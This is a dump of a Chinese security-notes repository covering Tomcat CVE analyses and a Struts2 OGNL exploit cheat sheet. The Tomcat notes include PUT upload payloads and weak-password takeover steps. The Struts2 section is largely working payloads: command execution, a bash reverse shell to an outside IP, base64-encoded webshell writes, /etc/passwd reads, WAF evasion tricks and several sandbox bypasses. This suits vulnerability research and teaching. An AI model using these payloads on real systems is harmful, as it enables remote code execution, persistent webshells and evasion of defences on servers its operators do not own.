 83 |         result = name.startsWith(".") || name.contains("../") || name.contains("..\\") || name.startsWith("/") || name.startsWith("\\") || name.endsWith("/") || name.contains("..%2f") || name.contains("..%5c") || name.startsWith("%2f") || name.startsWith("%5c") || name.endsWith("%2f") || name.contains("..\\u002f") || name.contains("..\\u005c") || name.startsWith("\\u002f") || name.startsWith("\\u005c") || name.endsWith("\\u002f");
 84 |     }
 85 | 
 86 |     return result;
 87 | }
 88 | 
 89 | private boolean libraryNameIsSafe(String libraryName) {
 90 |     assert null != libraryName;
 91 | 
 92 |     boolean result = !libraryName.startsWith(".") && !libraryName.startsWith("/") && !libraryName.contains("/") && !libraryName.startsWith("\\") && !libraryName.contains("\\") && !libraryName.startsWith("%2e") && !libraryName.startsWith("%2f") && !libraryName.contains("%2f") && !libraryName.startsWith("%5c") && !libraryName.contains("%5c") && !libraryName.startsWith("\\u002e") && !libraryName.startsWith("\\u002f") && !libraryName.contains("\\u002f") && !libraryName.startsWith("\\u005c") && !libraryName.contains("\\u005c");
 93 |     return result;
 94 | }
 95 | ```
 96 | 
 97 | ### /html/*
 98 | 
 99 | ### /faces/*
100 | 
101 | ### *.jsf
102 | 
103 | ### jsf文件的解析执行，由javax.faces.webapp.FacesServlet处理。
104 | 
105 | ### /theme/*
106 | 
107 | 获取URI路径信息（`/theme/<resourceName>`）并调用
108 | ```java
109 | this.getClass().getResourceAsStream(resourceName)
110 | ```
111 | 读取内容并返回。
112 | 
113 | ### 鉴权
114 | 
115 | 默认配置如下，所有/*的路由都需要admin权限才能访问，
116 | ```xml
117 | <!-- only user from admin realm can access any URL pattern -->
118 | <security-constraint>
119 |     <web-resource-collection>
120 |         <web-resource-name>protected</web-resource-name>
121 |         <url-pattern>/*</url-pattern>
122 |     </web-resource-collection>
123 |     <auth-constraint>
124 |         <role-name>admin</role-name>
125 |     </auth-constraint>
126 | </security-constraint>
127 | ```
128 | 除了下面这部分
129 | ```xml
130 | <security-constraint>
131 |     <web-resource-collection>
132 |         <web-resource-name>public</web-resource-name>
133 |         <url-pattern>/theme/com/*</url-pattern>
134 |         <url-pattern>/theme/org/*</url-pattern>        
135 |         <url-pattern>/resource/*</url-pattern>
136 |         <url-pattern>/theme/META-INF/*</url-pattern>
137 |         <http-method>GET</http-method>
138 |     </web-resource-collection>
139 | </security-constraint>
140 | ```
141 | 


--------------------------------------------------------------------------------
/Server/Tomcat.md:
--------------------------------------------------------------------------------
  1 | # Tomcat
  2 | 
  3 | 版本下载： http://archive.apache.org/dist/tomcat/
  4 | 
  5 | 官方漏洞声明： https://tomcat.apache.org/security-7.html
  6 | 
  7 | 历史漏洞
  8 | 
  9 | |漏洞编号|漏洞类型|影响版本|
 10 | |:----:|:----:|:----:|
 11 | |CVE-2017-12615|写文件|7.0.0 to 7.0.79|
 12 | |CVE-2020-1938|文件读取/文件包含|< 9.0.31, 8.5.51 or 7.0.100|
 13 | |CVE-2019-0232|RCE|9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93|
 14 | |无|后台弱密码+GetShell|7+|
 15 | 
 16 | **windows远程调试**
 17 | 
 18 | 设置IDEA Remote JVM Debug: `-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5555`
 19 | 
 20 | 修改Tomcat目录/bin/catalina.bat，找到`set JAVA_OPTS=`代码行，设置如下
 21 | ```
 22 | set JAVA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5555"
 23 | ```
 24 | Windows下命令行运行`catalina.bat start`，即可开启调试
 25 | 
 26 | 
 27 | ## CVE-2017-12615
 28 | 漏洞描述，发现和readonly配置有关，并且可以通过PUT方法上传jsp文件
 29 | > When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request
 30 | 
 31 | 更改`/conf/web.xml`文件中的配置，原配置如下
 32 | ```xml
 33 | <!--   readonly   Is this context "read only", so HTTP      -->
 34 | <!--              commands like PUT and DELETE are      -->
 35 | <!--              rejected?  [true]      -->
 36 | <servlet>
 37 |     <servlet-name>default</servlet-name>
 38 |     <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
 39 |     <init-param>
 40 |         <param-name>debug</param-name>
 41 |         <param-value>0</param-value>
 42 |     </init-param>
 43 |     <init-param>
 44 |         <param-name>listings</param-name>
 45 |         <param-value>false</param-value>
 46 |     </init-param>
 47 |     <load-on-startup>1</load-on-startup>
 48 | </servlet>
 49 | ```
 50 | 增加一行readonly属性，并赋值为false
 51 | ```
 52 |     <init-param>
 53 |         <param-name>readonly</param-name>
 54 |         <param-value>false</param-value>
 55 |     </init-param>
 56 | ```
 57 | 
 58 | 一些payload
 59 | ```
 60 | PUT /test.jsp::$DATA
 61 | PUT /test2.jsp%20
 62 | PUT /test1.jsp/
 63 | ```
 64 | 对于第一个payload，可以参考Windows NTFS流： https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3?redirectedfrom=MSDN
 65 | 
 66 | 对于第二个payload，Windows不允许空字符作为文件名结尾，所以会去掉空字符
 67 | 
 68 | 对于第三个payload，是java.io.File的特性，在new File时，会去掉末尾的/
 69 | 
 70 | 根据/conf/web.xml中的配置，jsp文件的解析是由JspServlet来执行的，而其他的默认由DefaultServlet来解析。DefaultServlet的doPut方法是漏洞触发的入口。上述在jsp后缀后面加特殊字符都是为了绕过JSPServlet，让DefaultServlet来解析
 71 | ```
 72 |     <servlet>
 73 |         <servlet-name>jsp</servlet-name>
 74 |         <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
 75 |     </servlet>
 76 |     
 77 |     <servlet>
 78 |         <servlet-name>default</servlet-name>
 79 |         <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
 80 |     </servlet>
 81 |     
 82 |     <!-- The mapping for the default servlet -->
 83 |     <servlet-mapping>
 84 |         <servlet-name>default</servlet-name>
 85 |         <url-pattern>/</url-pattern>
 86 |     </servlet-mapping>
 87 | 
 88 |     <!-- The mappings for the JSP servlet -->
 89 |     <servlet-mapping>
 90 |         <servlet-name>jsp</servlet-name>
 91 |         <url-pattern>*.jsp</url-pattern>
 92 |         <url-pattern>*.jspx</url-pattern>
 93 |     </servlet-mapping>
 94 | ```
 95 | 
 96 | DefaultServlet的doPut方法
 97 | ```
 98 | protected void doPut(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
 99 |     if (this.readOnly) { // readOnly为true，就403禁止
100 |         resp.sendError(403);
101 |     } else {
102 |         String path = this.getRelativePath(req);
103 |         boolean exists = true;
104 | 
105 |         try {
106 |             this.resources.lookup(path); // 从资源中查找路径下的文件是否存在
107 |         } catch (NamingException var11) {
108 |             exists = false;
109 |         }
110 | 
111 |         boolean result = true;
112 |         File contentFile = null;
113 |         DefaultServlet.Range range = this.parseContentRange(req, resp); // 判断请求头是否包含"Content-Range"
114 |         InputStream resourceInputStream = null;
115 |         if (range != null) {
116 |             contentFile = this.executePartialPut(req, range, path);
117 |             resourceInputStream = new FileInputStream(contentFile);
118 |         } else {
119 |             resourceInputStream = req.getInputStream();
120 |         }
121 | 
122 |         try {
123 |             Resource newResource = new Resource((InputStream)resourceInputStream);
124 |             if (exists) {
125 |                 this.resources.rebind(path, newResource);
126 |             } else {
127 |                 this.resources.bind(path, newResource); // 
128 |             }
129 |         } catch (NamingException var10) {
130 |             result = false;
131 |         }
132 | 
133 |         if (result) {
134 |             if (exists) {
135 |                 resp.setStatus(204);
136 |             } else {
137 |                 resp.setStatus(201);
138 |             }
139 |         } else {
140 |             resp.sendError(409);
141 |         }
142 | 
143 |     }
144 | }
145 | ```
146 | 当资源不存在时，会调用FileDirContext类
147 | ```
148 | public void bind(String name, Object obj, Attributes attrs) throws NamingException {
149 |     File file = new File(this.base, name);
150 |     if (file.exists()) {
151 |         throw new NameAlreadyBoundException(sm.getString("resources.alreadyBound", new Object[]{name}));
152 |     } else {
153 |         this.rebind(name, obj, attrs); // 如果该文件不存在，调用rebind
154 |     }
155 | }
156 | ```
157 | rebind方法是明显的写文件函数
158 | ```
159 | public void rebind(String name, Object obj, Attributes attrs) throws NamingException {
160 |     File file = new File(this.base, name); // new File的时候会调用java.io.WinNTFileSystem .resolve() 会去掉末尾的/
161 |     InputStream is = null;
162 |     if (obj instanceof Resource) {
163 |         is = ((Resource)obj).streamContent();
164 |     } ...
165 |     else {
166 |         FileOutputStream os = null;
167 |         byte[] buffer = new byte[2048];
168 |         boolean var8 = true;
169 | 
170 |         try {
171 |             os = new FileOutputStream(file);
172 | 
173 |             while(true) {
174 |                 int len = is.read(buffer);
175 |                 if (len == -1) {
176 |                     return;
177 |                 }
178 | 
179 |                 os.write(buffer, 0, len);
180 |             }
181 |         } ...
182 |     }
183 | }
184 | ```
185 | 
186 | ## CVE-2020-1938
187 | Tomcat对于协议的解析包括：HTTP/1.1、AJP、HTTP/2。这个漏洞的是Tomcat AJP协议中的缺陷，攻击者可以读取或包含Tomcat的webapp目录中的任何文件
188 | 
189 | 漏洞利用脚本： https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
190 | 
191 | 漏洞调试时需要添加如下pom.xml
192 | ```
193 | <dependency>
194 |     <groupId>org.apache.tomcat</groupId>
195 |     <artifactId>tomcat-coyote</artifactId>
196 |     <version>7.0.79</version>
197 | </dependency>
198 | ```
199 | 
200 | 这个漏洞的触发点也是DefaultServlet，CVE-2017-12615执行的doPut而这个漏洞则执行的doGet
201 | ```
202 | protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
203 |     this.serveResource(request, response, true);
204 | }
205 | ```
206 | serveResource的具体实现如下
207 | ```
208 | protected void serveResource(HttpServletRequest request, HttpServletResponse response, boolean content) throws IOException, ServletException {
209 |     boolean serveContent = content;
210 |     String path = this.getRelativePath(request, true); // 获取文件路径
211 | 
212 |     if (path.length() == 0) { this.doDirectoryRedirect(request, response);} 
213 |     else {
214 |         CacheEntry cacheEntry = this.resources.lookupCache(path); // path和resource根目录拼接，得到资源实体
215 |         boolean isError = DispatcherType.ERROR == request.getDispatcherType();
216 |         String contentType;
217 |         if (!cacheEntry.exists) {...
218 |         } else if (cacheEntry.context == null && (path.endsWith("/") || path.endsWith("\\"))) { ...
219 |         } else {
220 |             contentType = cacheEntry.attributes.getMimeType();
221 |             ...
222 |             ServletOutputStream ostream = null;
223 |             PrintWriter writer = null;
224 |             if (serveContent) {
225 |                 try {
226 |                     ostream = response.getOutputStream(); // 获取输出流
227 |                 } ...
228 |             }
229 |             ServletResponse r = response;
230 |             long contentWritten;
231 |             for(contentWritten = 0L; r instanceof ServletResponseWrapper; r = ((ServletResponseWrapper)r).getResponse()) {}
232 |             if (r instanceof ResponseFacade) {
233 |                 contentWritten = ((ResponseFacade)r).getContentWritten();
234 |             }
235 | 
236 |             if (cacheEntry.context == null && !isError && (ranges != null && !ranges.isEmpty() || request.getHeader("Range") != null) && ranges != FULL) { ...} 
237 |             else {
238 |                 if (contentType != null) {
239 |                     response.setContentType(contentType);
240 |                 }
241 | 
242 |                 if (cacheEntry.resource != null && contentLength >= 0L && (!serveContent || ostream != null)) {
243 |                     if (contentWritten == 0L) {
244 |                         if (contentLength < 2147483647L) {
245 |                             response.setContentLength((int)contentLength);
246 |                         }...
247 |                     }
248 |                 }
249 | 
250 |                 InputStream renderResult = null;
251 |                 if (serveContent) {
252 |                     ...
253 |                     if (ostream != null) {
254 |                         if (!this.checkSendfile(request, response, cacheEntry, contentLength, (DefaultServlet.Range)null)) {
255 |                             this.copy(cacheEntry, renderResult, ostream); // 将文件实体的内容写入到输出流
256 |                         }
257 |                     } else {
258 |                         this.copy(cacheEntry, renderResult, writer);
259 |                     }
260 |      ...
261 | }
262 | ```
263 | getRelativePath会得到路径`servletPath+pathInfo`。如果`request.getAttribute("javax.servlet.include.request_uri") `值不为空，路径的值都是从属性`javax.servlet.include.path_info`和`javax.servlet.include.servlet_path`中获取的。
264 | <details>
265 |     <summary>getRelativePath</summary>
266 |     <pre><code>
267 | protected String getRelativePath(HttpServletRequest request, boolean allowEmptyPath) {
268 |     String servletPath;
269 |     String pathInfo;
270 |     if (request.getAttribute("javax.servlet.include.request_uri") != null) {
271 |         pathInfo = (String)request.getAttribute("javax.servlet.include.path_info");
272 |         servletPath = (String)request.getAttribute("javax.servlet.include.servlet_path");
273 |     } else {
274 |         pathInfo = request.getPathInfo();
275 |         servletPath = request.getServletPath();
276 |     }
277 |     StringBuilder result = new StringBuilder();
278 |     if (servletPath.length() > 0) {
279 |         result.append(servletPath);
280 |     }
281 |     if (pathInfo != null) {
282 |         result.append(pathInfo);
283 |     }
284 |     if (result.length() == 0 && !allowEmptyPath) {
285 |         result.append('/');
286 |     }
287 |     return result.toString();
288 | }
289 |     </code></pre>
290 | </details>
291 | 
292 | ## 弱密码
293 | 查看用户权限配置文件`conf/tomcat-users.xml`，示例如下，可以根据官网进行配置： https://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html
294 | ```
295 | <?xml version="1.0" encoding="UTF-8"?>
296 | <tomcat-users xmlns="http://tomcat.apache.org/xml"
297 |               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
298 |               xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
299 |               version="1.0">
300 | 
301 |     <role rolename="manager-gui"/>
302 |     <role rolename="manager-script"/>
303 |     <role rolename="manager-jmx"/>
304 |     <role rolename="manager-status"/>
305 |     <role rolename="admin-gui"/>
306 |     <role rolename="admin-script"/>
307 |     <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
308 | 
309 | </tomcat-users>
310 | ```
311 | 访问`http://ip:8080/manager/html`输入弱密码，进入后台，上传war包
312 | 


--------------------------------------------------------------------------------
/Server/Weblogic.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Server/Weblogic.md


--------------------------------------------------------------------------------
/Struts2/POC解析.md:
--------------------------------------------------------------------------------
  1 | ## POC解析
  2 | 
  3 | ### POC构造
  4 | 
  5 | #### (1) 命令执行
  6 | ProcessBuilder基本用法
  7 | ```
  8 | String[] cmd = new String[]{"open","-a","/System/Applications/Calculator.app"};
  9 | ProcessBuilder processBuilder = new ProcessBuilder(cmd);
 10 | processBuilder.redirectErrorStream(true);
 11 | try {
 12 |     Process process = processBuilder.start();
 13 |     BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
 14 |     String line;
 15 |     while ((line = br.readLine()) != null) {
 16 |         System.out.println(line);
 17 |     }
 18 | }
 19 | ```
 20 | 对应的OGNL表达式
 21 | ```
 22 | #a=new ProcessBuilder(new java.lang.String[]{"cmd"}).redirectErrorStream(true).start(),
 23 | #b=#a.getInputStream(),
 24 | #c=new java.io.InputStreamReader(#b),
 25 | #br=new java.io.BufferedReader(#c),
 26 | #e=new char[50000],
 27 | #br.read(#e)
 28 | ```
 29 | Runtime对应的OGNL表达式
 30 | ```
 31 | #myret=@java.lang.Runtime@getRuntime().exec(\'open\u0020/System/Applications/Calculator.app\')
 32 | //unicode替换 # =
 33 | \u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'open\u0020/System/Applications/Calculator.app\')
 34 | ```
 35 | 根据操作系统执行命令
 36 | ```
 37 | #cmd='bash -i >& /dev/tcp/25.25.24.184/9999 0>&1' //要执行的命令
 38 | #iswin=@java.lang.System@getProperty('os.name').toLowerCase().contains('win')
 39 | //如果包含win，即调用windows的cmd.exe；否则认为是linux，调用/bin/bash
 40 | #cmds=#iswin?new java.lang.String[]{'cmd.exe','/c',#cmd}:new java.lang.String[]{'/bin/bash','-c',#cmd}
 41 | 
 42 | //第一种写法
 43 | #s=new java.util.Scanner((new java.lang.ProcessBuilder(#cmds)).start().getInputStream()).useDelimiter('\\AAAA')
 44 | #str=#s.hasNext()?#s.next():''
 45 | #resp=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse")
 46 | #resp.setCharacterEncoding('UTF-8')
 47 | #resp.getWriter().println(#str)
 48 | #resp.getWriter().flush()
 49 | #resp.getWriter().close()
 50 |   
 51 | //第二种写法
 52 | #p=new java.lang.ProcessBuilder(#cmds)
 53 | #p.redirectErrorStream(true)
 54 | #process=#p.start()
 55 | #ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())
 56 | @org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)
 57 | #ros.flush()
 58 | ```
 59 | 
 60 | #### (2) 输出回显
 61 | HttpServletResponse获取输出流有两种方式，getOutStream和getWriter，基本用法如下
 62 | ```
 63 | //HttpServletResponse对象获取
 64 | #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse")
 65 | 
 66 | //输出流获取
 67 | ServletOutputStream outputStream = response.getOutputStream();
 68 | outputStream.print("Hello");
 69 | 
 70 | PrintWriter writer = response.getWriter();
 71 | writer.write("hello");
 72 | 
 73 | //or
 74 | writer.println("hello")
 75 | writer.flush();
 76 | writer.close();
 77 | ```
 78 | 对应的OGNL语法
 79 | ```
 80 | #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse")
 81 | #f.getWriter().write(#e),
 82 | #f.getWriter().flush(),
 83 | #f.getWriter().close()
 84 | ```
 85 | 如果开发场景下自带回显
 86 | ```
 87 | #q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
 88 | ```
 89 | 
 90 | #### (3) 获取Web目录
 91 | getRealPath获取路径的基本用法
 92 | ```
 93 | request.getRealPath("/"); //获取根路径
 94 | request.getRealPath(request.getRequestURI()); //获取jsp路径
 95 | request.getSession().getServletContext().getRealPath("/"); //获取根路径
 96 | .getClass().getClassLoader().getResource("").getPath(); //获取工程classes下的路径
 97 | request.getServletContext().getRealPath(File.separator); 
 98 | "/" 可以写成 File.separator
 99 | ```
100 | 对应的OGNL语法
101 | ```
102 | //request获取方法
103 | #req=@org.apache.struts2.ServletActionContext@getRequest()
104 | #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
105 | 
106 | //response回显方法1
107 | #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()
108 | #response.println(#req.getRealPath('/')),#response.flush(),#response.close()
109 | 
110 | //response回显方法2
111 | #response=@org.apache.struts2.ServletActionContext@getResponse()
112 | #response.getWriter().println(#req.getRealPath('/'))
113 | #response.getWriter().close()
114 | ```
115 | 
116 | #### (4) print探测漏洞
117 | ```
118 | #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
119 | #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')
120 | #resp.setCharacterEncoding('UTF8')
121 | #resp.getWriter().print("here_is_")
122 | #resp.getWriter().print("test")
123 | #resp.getWriter().flush()
124 | #resp.getWriter().close()
125 | ```
126 | 
127 | #### (5) 获取系统信息
128 | ```
129 | #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
130 | #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')
131 | #resp.setCharacterEncoding('UTF-8')
132 | #resp.getWriter().print("os.version")
133 | #resp.getWriter().print(@java.lang.System@getProperty("os.version"))
134 | #resp.getWriter().flush()
135 | #resp.getWriter().close()
136 | ```
137 | 
138 | #### (6) 文件上传/写文件
139 | 
140 | 利用FileWriter，传入base64加密后的木马
141 | 
142 | ```java
143 | #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
144 | #res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')
145 | #shell="" //base64加密后的木马
146 | #cmd=new java.lang.String(new sun.misc.BASE64Decoder().decodeBuffer(#shell))
147 | #res.getWriter().print(#cmd)
148 | #bw=new java.io.BufferedWriter(new java.io.FileWriter(#req.getRealPath("/testb.jsp")))
149 | #bw.write(#cmd)
150 | #bw.close()
151 | ```
152 | 
153 | 直接写文件
154 | 
155 | ```java
156 | {#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
157 | #res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')
158 | #res.getWriter().print("file context")
159 | #res.getWriter().print("ok")
160 | #res.getWriter().print(#req.getContextPath())
161 | #res.getWriter().flush()
162 | #res.getWriter().close()
163 | new java.io.BufferedWriter(new java.io.FileWriter(#req.getRealPath("/qqq.jsp"))).append(#req.getParameter("shell")).close()}&shell=123
164 | ```
165 | 
166 | #### (7) 无需new
167 | ```
168 | #UnicodeSec=#application['org.apache.tomcat.InstanceManager']
169 | #exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')
170 | #cmd={'cat //etc//passwd'}
171 | #res=#exec.exec(#cmd)
172 | ```
173 | 
174 | #### (8) 括号解析机制
175 | ```
176 | //无点号(.)连接的表达式，先计算one，再以two为根对象计算一次
177 | (one)(two) 
178 | 
179 | //常见写法
180 | (expression)(constant)=value  -> 执行expression=value
181 | (constant)((expression1)(expression2))  ->执行expression2，再执行expression1
182 | 
183 | 
184 | top['foo'](0) -> (top['foo'])(0)
185 | z[(foo)('meh')] -> z 和 [()()]
186 | ```
187 | 
188 | ### 绕WAF
189 | ```
190 | // 1. 敏感词字符拆分
191 | //原
192 | #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')
193 | //拆
194 | #req=#context.get('co'+'m.open'+'symphony.xwor'+'k2.disp'+'atcher.HttpSer'+'vletReq'+'uest')
195 | 
196 | 
197 | // 2. url编码
198 | `#`、`=`、`:`、`+`、`空格`等
199 | 
200 | // 3. base64混淆
201 | #cmd=new java.lang.String(new sun.misc.BASE64Decoder().decodeBuffer(#req.getHeader('zz')))
202 | #cmd=new java.lang.String(new sun.misc.BASE64Decoder().decodeBuffer(#req.getHeader('zz').replace('DASHUAIGE','')))
203 | 
204 | // 4. unicode编码
205 | 例如，`#`编码为`\u0023`等，其余字符也可进行unicode编码
206 | 
207 | // 5. 字符填充，如空格、`\0a` `\t`、垃圾字符
208 | 在`#`和非根对象中插入空格等
209 | 在`.`后面加入`\0a`或`\t`
210 | ```
211 | 
212 | ### 绕Access限制
213 | #### (1) denyMethodExecution
214 | 
215 | ```java
216 | #context[\'xwork.MethodAccessor.denyMethodExecution\']=false
217 | #_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET
218 | ```
219 | 
220 | #### (2) allowStaticMethodAccess
221 | 
222 | ```java
223 | //简版
224 | #_memberAccess["allowStaticMethodAccess"]=true
225 | 
226 | //第一种
227 | #_memberAccess["allowStaticMethodAccess"]=true
228 | #foo=new java.lang.Boolean("false")
229 | #context["xwork.MethodAccessor.denyMethodExecution"]=#foo
230 |   
231 | //第二种
232 | #f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess")
233 | #f.setAccessible(true)
234 | #f.set(#_memberAccess,true)
235 | #context["xwork.MethodAccessor.denyMethodExecution"]=false
236 |   
237 | //第三种
238 | #context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false)
239 | #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true)
240 | ```
241 | 
242 | #### (3) @DEFAULT_MEMBER_ACCESS
243 | 
244 | ```java
245 | #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
246 | ```
247 | 
248 | #### (4) 多重黑名单
249 | 
250 | ```java
251 | #_memberAccess['allowPrivateAccess']=true
252 | #_memberAccess['allowProtectedAccess']=true
253 | #_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties']
254 | #_memberAccess['excludedClasses']=#_memberAccess['acceptProperties']
255 | #_memberAccess['allowPackageProtectedAccess']=true
256 | #_memberAccess['allowStaticMethodAccess']=true
257 | ```
258 | 
259 | #### (5) container
260 | 
261 | ```java
262 | //第一种
263 | #container=#context['com.opensymphony.xwork2.ActionContext.container']
264 | #ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)
265 | #ognlUtil.getExcludedPackageNames().clear()
266 | #ognlUtil.getExcludedClasses().clear()
267 | #dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
268 | #context.setMemberAccess(#dm)
269 |   
270 | //第二种
271 | #ct=#request['struts.valueStack'].context
272 | #cr=#ct['com.opensymphony.xwork2.ActionContext.container']
273 | #ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)
274 | #ou.setExcludedClasses('')
275 | #ou.setExcludedPackageNames('')
276 | #dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
277 | #ct.setMemberAccess(#dm)
278 | ```
279 | 
280 | #### (6) BeanMap
281 | 
282 | ```java
283 | #UnicodeSec=#application['org.apache.tomcat.InstanceManager']
284 | #potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')
285 | #stackvalue=#attr['struts.valueStack']
286 | #potats0.setBean(#stackvalue)
287 | #context=#potats0.get('context')
288 | #potats0.setBean(#context)
289 | #sm=#potats0.get('memberAccess')
290 | #emptySet=#UnicodeSec.newInstance('java.util.HashSet')
291 | #potats0.setBean(#sm)
292 | #potats0.put('excludedClasses',#emptySet)
293 | #potats0.put('excludedPackageNames',#emptySet)
294 | ```
295 | 


--------------------------------------------------------------------------------
/Struts2/demo/S2-001.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-001.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-007.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-007.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-009.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-009.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-012.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-012.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-013.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-013.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-015.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-015.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-019.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-019.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-029.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-029.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-033.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-033.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-045.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-045.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-046.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-046.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-048.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-048.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-052.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-052.war


--------------------------------------------------------------------------------
/Struts2/demo/S2-053.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/S2-053.war


--------------------------------------------------------------------------------
/Struts2/demo/s2-003.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-003.war


--------------------------------------------------------------------------------
/Struts2/demo/s2-005.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-005.war


--------------------------------------------------------------------------------
/Struts2/demo/s2-008.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-008.war


--------------------------------------------------------------------------------
/Struts2/demo/s2-016.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-016.war


--------------------------------------------------------------------------------
/Struts2/demo/s2-032.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-032.war


